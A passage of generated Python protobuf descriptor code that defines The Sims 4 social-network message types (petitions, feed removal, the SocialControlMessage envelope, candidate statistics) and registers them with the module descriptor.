_SOCIALCOMMENTPETITIONMESSAGE = descriptor.Descriptor(name='SocialCommentPetitionMessage', full_name='EA.Sims4.Network.SocialCommentPetitionMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialCommentPetitionMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='commentid', full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentid', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='commentKey', full_name='EA.Sims4.Network.SocialCommentPetitionMessage.commentKey', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3188, serialized_end=3276)
# Report/petition a profile bio: reporter nucleusid plus the reported bio owner's bio_nucleusid.
_SOCIALBIOPETITIONMESSAGE = descriptor.Descriptor(name='SocialBioPetitionMessage', full_name='EA.Sims4.Network.SocialBioPetitionMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='nucleusid', full_name='EA.Sims4.Network.SocialBioPetitionMessage.nucleusid', index=0, number=1, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='bio_nucleusid', full_name='EA.Sims4.Network.SocialBioPetitionMessage.bio_nucleusid', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3278, serialized_end=3346)
# Remove a feed item by its feed_id (bytes).
_SOCIALFEEDREMOVALMESSAGE = descriptor.Descriptor(name='SocialFeedRemovalMessage', full_name='EA.Sims4.Network.SocialFeedRemovalMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='feed_id', full_name='EA.Sims4.Network.SocialFeedRemovalMessage.feed_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3348, serialized_end=3391)
_SOCIALCONTROLMESSAGE = descriptor.Descriptor(name='SocialControlMessage', full_name='EA.Sims4.Network.SocialControlMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='opcode', full_name='EA.Sims4.Network.SocialControlMessage.opcode', index=0, number=1, type=14, cpp_type=8, label=2, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='subop', full_name='EA.Sims4.Network.SocialControlMessage.subop', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='transactionId', full_name='EA.Sims4.Network.SocialControlMessage.transactionId', index=2, number=3, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='result', full_name='EA.Sims4.Network.SocialControlMessage.result', index=3, number=100, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='getwallcommentsmsg', full_name='EA.Sims4.Network.SocialControlMessage.getwallcommentsmsg', index=4, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='postwallcommentmsg', full_name='EA.Sims4.Network.SocialControlMessage.postwallcommentmsg', index=5, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, 
enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='deletewallcommentmsg', full_name='EA.Sims4.Network.SocialControlMessage.deletewallcommentmsg', index=6, number=6, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='friendmsg', full_name='EA.Sims4.Network.SocialControlMessage.friendmsg', index=7, number=7, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='genericresponse', full_name='EA.Sims4.Network.SocialControlMessage.genericresponse', index=8, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='playerinfo', full_name='EA.Sims4.Network.SocialControlMessage.playerinfo', index=9, number=9, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='feedsubmsg', full_name='EA.Sims4.Network.SocialControlMessage.feedsubmsg', index=10, number=10, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='searchresultmsg', full_name='EA.Sims4.Network.SocialControlMessage.searchresultmsg', index=11, number=11, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, 
is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='inviteresponsemsg', full_name='EA.Sims4.Network.SocialControlMessage.inviteresponsemsg', index=12, number=12, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='originerror', full_name='EA.Sims4.Network.SocialControlMessage.originerror', index=13, number=13, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialcassandratest', full_name='EA.Sims4.Network.SocialControlMessage.socialcassandratest', index=14, number=14, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialfriendlistrequestmsg', full_name='EA.Sims4.Network.SocialControlMessage.socialfriendlistrequestmsg', index=15, number=15, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialrequestnucleusidfrompersona', full_name='EA.Sims4.Network.SocialControlMessage.socialrequestnucleusidfrompersona', index=16, number=16, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialnucleusidfrompersonaresponse', full_name='EA.Sims4.Network.SocialControlMessage.socialnucleusidfrompersonaresponse', index=17, number=17, type=11, cpp_type=10, label=1, has_default_value=False, 
default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialexchangemessage', full_name='EA.Sims4.Network.SocialControlMessage.socialexchangemessage', index=18, number=18, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialrequestfeedwallmessage', full_name='EA.Sims4.Network.SocialControlMessage.socialrequestfeedwallmessage', index=19, number=19, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='stat_tickers', full_name='EA.Sims4.Network.SocialControlMessage.stat_tickers', index=20, number=21, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='comment_petition_msg', full_name='EA.Sims4.Network.SocialControlMessage.comment_petition_msg', index=21, number=22, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='feedremovalmsg', full_name='EA.Sims4.Network.SocialControlMessage.feedremovalmsg', index=22, number=23, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='bio_petition_msg', full_name='EA.Sims4.Network.SocialControlMessage.bio_petition_msg', index=23, number=24, type=11, cpp_type=10, label=1, 
has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='fb_event_msg', full_name='EA.Sims4.Network.SocialControlMessage.fb_event_msg', index=24, number=25, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='requestfollowers_msg', full_name='EA.Sims4.Network.SocialControlMessage.requestfollowers_msg', index=25, number=26, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='responsefollowers_msg', full_name='EA.Sims4.Network.SocialControlMessage.responsefollowers_msg', index=26, number=27, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='requestignorelist_msg', full_name='EA.Sims4.Network.SocialControlMessage.requestignorelist_msg', index=27, number=28, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='response_player_info_list_msg', full_name='EA.Sims4.Network.SocialControlMessage.response_player_info_list_msg', index=28, number=29, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='player_identification_list_msg', 
full_name='EA.Sims4.Network.SocialControlMessage.player_identification_list_msg', index=29, number=30, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='candidate_msg', full_name='EA.Sims4.Network.SocialControlMessage.candidate_msg', index=30, number=31, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='evaluation_results_msg', full_name='EA.Sims4.Network.SocialControlMessage.evaluation_results_msg', index=31, number=32, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='cg_update_msg', full_name='EA.Sims4.Network.SocialControlMessage.cg_update_msg', index=32, number=33, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3394, serialized_end=5713) _SOCIALINVALIDATEMSG = descriptor.Descriptor(name='SocialInvalidateMsg', full_name='EA.Sims4.Network.SocialInvalidateMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='cache_index', full_name='EA.Sims4.Network.SocialInvalidateMsg.cache_index', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='key', 
full_name='EA.Sims4.Network.SocialInvalidateMsg.key', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5715, serialized_end=5770) _SOCIALCONTROLQUEUEBROADCASTMESSAGE = descriptor.Descriptor(name='SocialControlQueueBroadcastMessage', full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='control', full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.control', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='friendIds', full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.friendIds', index=1, number=3, type=4, cpp_type=4, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5772, serialized_end=5888) _LIFEEVENTMESSAGE = descriptor.Descriptor(name='LifeEventMessage', full_name='EA.Sims4.Network.LifeEventMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='type', full_name='EA.Sims4.Network.LifeEventMessage.type', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), 
descriptor.FieldDescriptor(name='sim_ids', full_name='EA.Sims4.Network.LifeEventMessage.sim_ids', index=1, number=2, type=6, cpp_type=4, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5890, serialized_end=5943) _SOCIALFACEBOOKEVENTMESSAGE = descriptor.Descriptor(name='SocialFacebookEventMessage', full_name='EA.Sims4.Network.SocialFacebookEventMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='objectId', full_name='EA.Sims4.Network.SocialFacebookEventMessage.objectId', index=0, number=1, type=9, cpp_type=9, label=2, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='accessToken', full_name='EA.Sims4.Network.SocialFacebookEventMessage.accessToken', index=1, number=2, type=9, cpp_type=9, label=2, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='guid', full_name='EA.Sims4.Network.SocialFacebookEventMessage.guid', index=2, number=3, type=9, cpp_type=9, label=2, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5945, serialized_end=6026) _SOCIALCANDIDATESTATISTICSUBMESSAGE = descriptor.Descriptor(name='SocialCandidateStatisticSubmessage', 
full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='remote_id', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.remote_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='views_count', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.views_count', index=1, number=2, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='wins_count', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.wins_count', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='platform', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.platform', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='category', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.category', index=4, number=5, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='was_reported', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.was_reported', index=5, number=6, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, 
enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x18\x01'))), descriptor.FieldDescriptor(name='expires_epoch_sec', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.expires_epoch_sec', index=6, number=7, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6029, serialized_end=6214) _SOCIALCANDIDATESMESSAGE = descriptor.Descriptor(name='SocialCandidatesMessage', full_name='EA.Sims4.Network.SocialCandidatesMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='count', full_name='EA.Sims4.Network.SocialCandidatesMessage.count', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='platform_restriction', full_name='EA.Sims4.Network.SocialCandidatesMessage.platform_restriction', index=1, number=2, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='category_restriction', full_name='EA.Sims4.Network.SocialCandidatesMessage.category_restriction', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='challenge', full_name='EA.Sims4.Network.SocialCandidatesMessage.challenge', index=3, number=4, type=9, cpp_type=9, label=1, 
has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='digest', full_name='EA.Sims4.Network.SocialCandidatesMessage.digest', index=4, number=5, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='candidates', full_name='EA.Sims4.Network.SocialCandidatesMessage.candidates', index=5, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='expire_epoch_secs', full_name='EA.Sims4.Network.SocialCandidatesMessage.expire_epoch_secs', index=6, number=7, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6217, serialized_end=6453) _SOCIALEVALUATIONRESULTSMESSAGE = descriptor.Descriptor(name='SocialEvaluationResultsMessage', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='winner_ids', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.winner_ids', index=0, number=1, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='loser_ids', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.loser_ids', index=1, number=2, type=9, cpp_type=9, label=3, 
has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='digest', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.digest', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6455, serialized_end=6542) _SOCIALCGDIGESTMESSAGE = descriptor.Descriptor(name='SocialCGDigestMessage', full_name='EA.Sims4.Network.SocialCGDigestMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='challenge', full_name='EA.Sims4.Network.SocialCGDigestMessage.challenge', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='candidates', full_name='EA.Sims4.Network.SocialCGDigestMessage.candidates', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6544, serialized_end=6660) _SOCIALGENERICRESPONSE.fields_by_name['msg_type'].enum_type = Consts_pb2._SOCIALOPTYPES _SOCIALPLAYERINFOLIST_PLAYERINFO.fields_by_name['presence'].enum_type = Consts_pb2._ONLINEPRESENCESTATUS _SOCIALPLAYERINFOLIST_PLAYERINFO.containing_type = _SOCIALPLAYERINFOLIST _SOCIALPLAYERINFOLIST.fields_by_name['players'].message_type = _SOCIALPLAYERINFOLIST_PLAYERINFO 
_SOCIALSEARCHMSG.fields_by_name['search_results'].message_type = Localization_pb2._LOCALIZEDSTRINGTOKEN _SOCIALCASSANDRATEST.fields_by_name['opcode'].enum_type = Consts_pb2._CASSANDRATESTCODE _SOCIALEXCHANGEMESSAGE.fields_by_name['envelope'].message_type = Exchange_pb2._EXCHANGESOCIALENVELOPE _SOCIALFEEDITEMMESSAGE.fields_by_name['feed_type'].enum_type = _SOCIALFEEDITEMTYPE _SOCIALFEEDITEMMESSAGE.fields_by_name['metadata'].message_type = Exchange_pb2._TRAYMETADATA _SOCIALFEEDITEMMESSAGE.fields_by_name['followers_blob'].message_type = _SOCIALFOLLOWERSMESSAGE _SOCIALGETWALLCOMMENTSMESSAGE.fields_by_name['messages'].message_type = _SOCIALWALLCOMMENTMESSAGE _SOCIALPOSTWALLCOMMENTMESSAGE.fields_by_name['message'].message_type = _SOCIALWALLCOMMENTMESSAGE _SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['messages'].message_type = _SOCIALFEEDITEMMESSAGE _SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['unserialized_messages'].message_type = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO.containing_type = _SOCIALGETPLAYERINFOLISTMESSAGE _SOCIALGETPLAYERINFOLISTMESSAGE.fields_by_name['player_info_list'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO _SOCIALCONTROLMESSAGE.fields_by_name['opcode'].enum_type = Consts_pb2._SOCIALOPTYPES _SOCIALCONTROLMESSAGE.fields_by_name['subop'].enum_type = Consts_pb2._SOCIALOPTYPES _SOCIALCONTROLMESSAGE.fields_by_name['getwallcommentsmsg'].message_type = _SOCIALGETWALLCOMMENTSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['postwallcommentmsg'].message_type = _SOCIALPOSTWALLCOMMENTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['deletewallcommentmsg'].message_type = _SOCIALDELETEWALLCOMMENTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['friendmsg'].message_type = _SOCIALFRIENDMSG _SOCIALCONTROLMESSAGE.fields_by_name['genericresponse'].message_type = _SOCIALGENERICRESPONSE _SOCIALCONTROLMESSAGE.fields_by_name['playerinfo'].message_type = _SOCIALPLAYERINFOLIST 
_SOCIALCONTROLMESSAGE.fields_by_name['feedsubmsg'].message_type = Exchange_pb2._SOCIALFEEDSUBMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['searchresultmsg'].message_type = _SOCIALSEARCHMSG _SOCIALCONTROLMESSAGE.fields_by_name['inviteresponsemsg'].message_type = _SOCIALINVITERESPONSEMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['originerror'].message_type = _ORIGINERRORMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['socialcassandratest'].message_type = _SOCIALCASSANDRATEST _SOCIALCONTROLMESSAGE.fields_by_name['socialfriendlistrequestmsg'].message_type = _SOCIALFRIENDLISTREQUESTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['socialrequestnucleusidfrompersona'].message_type = _SOCIALREQUESTNUCLEUSIDFROMPERSONA _SOCIALCONTROLMESSAGE.fields_by_name['socialnucleusidfrompersonaresponse'].message_type = _SOCIALNUCLEUSIDFROMPERSONARESPONSE _SOCIALCONTROLMESSAGE.fields_by_name['socialexchangemessage'].message_type = _SOCIALEXCHANGEMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['socialrequestfeedwallmessage'].message_type = _SOCIALREQUESTFEEDWALLMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['stat_tickers'].message_type = Exchange_pb2._EXCHANGESTATTICKERMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['comment_petition_msg'].message_type = _SOCIALCOMMENTPETITIONMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['feedremovalmsg'].message_type = _SOCIALFEEDREMOVALMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['bio_petition_msg'].message_type = _SOCIALBIOPETITIONMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['fb_event_msg'].message_type = _SOCIALFACEBOOKEVENTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['requestfollowers_msg'].message_type = _SOCIALREQUESTFOLLOWERSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['responsefollowers_msg'].message_type = Exchange_pb2._SOCIALRESPONSEFOLLOWERSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['requestignorelist_msg'].message_type = _SOCIALREQUESTIGNORELISTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['response_player_info_list_msg'].message_type = 
_SOCIALGETPLAYERINFOLISTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['player_identification_list_msg'].message_type = Exchange_pb2._SERVERPLAYERIDENTIFICATIONLISTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['candidate_msg'].message_type = _SOCIALCANDIDATESMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['evaluation_results_msg'].message_type = _SOCIALEVALUATIONRESULTSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['cg_update_msg'].message_type = Exchange_pb2._SOCIALCGUPDATEMESSAGE _SOCIALCONTROLQUEUEBROADCASTMESSAGE.fields_by_name['control'].message_type = _SOCIALCONTROLMESSAGE _SOCIALCANDIDATESMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE _SOCIALCGDIGESTMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE DESCRIPTOR.message_types_by_name['SocialFriendMsg'] = _SOCIALFRIENDMSG DESCRIPTOR.message_types_by_name['SocialPersonaResponseMsg'] = _SOCIALPERSONARESPONSEMSG DESCRIPTOR.message_types_by_name['SocialGenericResponse'] = _SOCIALGENERICRESPONSE DESCRIPTOR.message_types_by_name['SocialPlayerInfoList'] = _SOCIALPLAYERINFOLIST DESCRIPTOR.message_types_by_name['SocialSearchMsg'] = _SOCIALSEARCHMSG DESCRIPTOR.message_types_by_name['OriginErrorMessage'] = _ORIGINERRORMESSAGE DESCRIPTOR.message_types_by_name['SocialInviteResponseMessage'] = _SOCIALINVITERESPONSEMESSAGE DESCRIPTOR.message_types_by_name['SocialCassandraTest'] = _SOCIALCASSANDRATEST DESCRIPTOR.message_types_by_name['SocialFriendListRequestMessage'] = _SOCIALFRIENDLISTREQUESTMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestNucleusIdFromPersona'] = _SOCIALREQUESTNUCLEUSIDFROMPERSONA DESCRIPTOR.message_types_by_name['SocialNucleusIdFromPersonaResponse'] = _SOCIALNUCLEUSIDFROMPERSONARESPONSE DESCRIPTOR.message_types_by_name['SocialExchangeMessage'] = _SOCIALEXCHANGEMESSAGE DESCRIPTOR.message_types_by_name['SocialFollowersMessage'] = _SOCIALFOLLOWERSMESSAGE DESCRIPTOR.message_types_by_name['SocialFeedItemMessage'] = _SOCIALFEEDITEMMESSAGE 
